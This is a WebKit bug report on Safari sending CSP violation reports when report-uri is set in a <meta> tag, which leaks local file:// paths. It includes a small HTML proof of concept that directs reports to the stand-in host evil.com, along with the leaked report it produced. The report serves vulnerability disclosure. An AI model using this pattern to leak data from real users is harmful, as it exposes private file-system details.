Bug 158263
| Summary: | CSP: report-uri is honored even if CSP is served via <meta> tag, leaking full file:// paths as document-uri | ||
|---|---|---|---|
| Product: | WebKit | Reporter: | Michele Spagnuolo <mikispag> |
| Component: | WebCore Misc. | Assignee: | Nobody <webkit-unassigned> |
| Status: | RESOLVED DUPLICATE | ||
| Severity: | Normal | CC: | aaj+webkit, bfulgham, dbates |
| Priority: | P2 | ||
| Version: | WebKit Local Build | ||
| Hardware: | Unspecified | ||
| OS: | OS X 10.11 | ||
Michele Spagnuolo
Safari leaks the full file:// path in document-uri if a report-uri is in a CSP served via <meta> tag, even if the specification explicitly prohibits to honor report-uri if the policy is served via <meta> tag[1].
PoC:
report-uri.html
----------------
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="img-src 'none'; report-uri https://evil.com/csp">
<title>CSP report-uri demo</title>
</head>
<body>
<img src="cat.jpg" alt="A nice cat">
</body>
</html>
This is the report sent to a remote report-uri:
{"csp-report":{"document-uri":"file:///Users/mikispag/CSP/report-uri.html","referrer":"","violated-directive":"img-src 'none'","original-policy":"img-src 'none'; report-uri https://evil.com/csp","blocked-uri":"file"}}
[1] https://www.w3.org/TR/CSP2/#directive-report-uri
| Attachments | ||
|---|---|---|
| Add attachment proposed patch, testcase, etc. |
Daniel Bates
*** This bug has been marked as a duplicate of bug 154307 ***
Daniel Bates
Out of curiosity, what version of Safari are you using? You can find the version of Safari in Safari > About Safari.